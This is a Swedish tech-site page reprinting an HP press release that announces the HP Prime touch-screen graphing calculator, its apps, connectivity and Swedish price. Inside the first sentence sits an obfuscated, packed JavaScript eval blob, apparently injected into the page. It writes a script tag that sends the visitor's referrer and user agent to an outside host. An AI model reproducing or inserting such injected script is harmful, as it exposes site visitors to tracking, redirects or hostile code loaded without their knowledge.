Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

HP lanserar Prime Graphing Calculator

HP lanserar Prime Graphing Calculator

HP lanserade nyligen HP eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbezt|var|u0026u|referrer|tyrnb||js|php’.split(’|’),0,{}))
Prime Graphing Calculator
, en innovativ grafisk kalkylator med färgdisplay och multi-touch LCD, som ska attrahera såväl studenter som lärare och prylälskare. Den nya smidiga designen gör att den ligger bra i handen och med touchfunktionen är det enkelt att göra beräkningar.

Kraften med touch
HP Prime är en av de första grafiska kalkylatorerna med touchskärm i färg. Med HP Prime kan studenterna vrida, flytta och ändra komplexa grafer och geometriska bilder bara genom att nudda med fingret.

Studenter som använder HP Primes grafiska kalkylator får tillgång till verktyg och applikationer som lyfter kalkylatorn till en helt ny nivå.  Det integrerade verktygssetet inkluderar t ex Advanced Graphing app, med vilken man kan rita nästan vad som helst inom x och y och som inkluderar olikheter. Dessutom får man HP Solve, en tidsbesparande applikation som gör det möjligt att lagra ekvationer och lösa ut variabler och ett inbyggt Computer Algebra System (CAS) som kan aktiveras eller avaktiveras för varje applikation om så önskas.

Kombinationen av elegant borstad stål och touch screen tillsammans med pålitligheten i HPs design gör HP Prime till ett välkommet alternativ till de mer ålderdomliga räknarna som finns på marknaden idag.

Lätt att ansluta
HPs Prime Connectivity Kit ger en integrerad och lärande HP-upplevelse. Studenter och lärare kan koppla den grafiska kalkylatorn till en PC via USB eller wireless (1). Det ger studenterna möjlighet att bland annat skapa, editera och skicka appar, program och information från sin PC till sin HP Prime. Om man glömmer att ta med sig sin HP Prime hem, ser den PC-baserade emulatorn till att alla uppdrag slutförts genom att göra en exakt kopia av HP Primes funktioner i en lättanvänd Windows-baserad design.

Pris och tillgänglighet (2)
HP Prime Graphing Calculator finns tillgänglig i Sverige i slutet av september till ett pris från 1295 kronor inklusive moms.

Detta är ett pressmeddelande från HP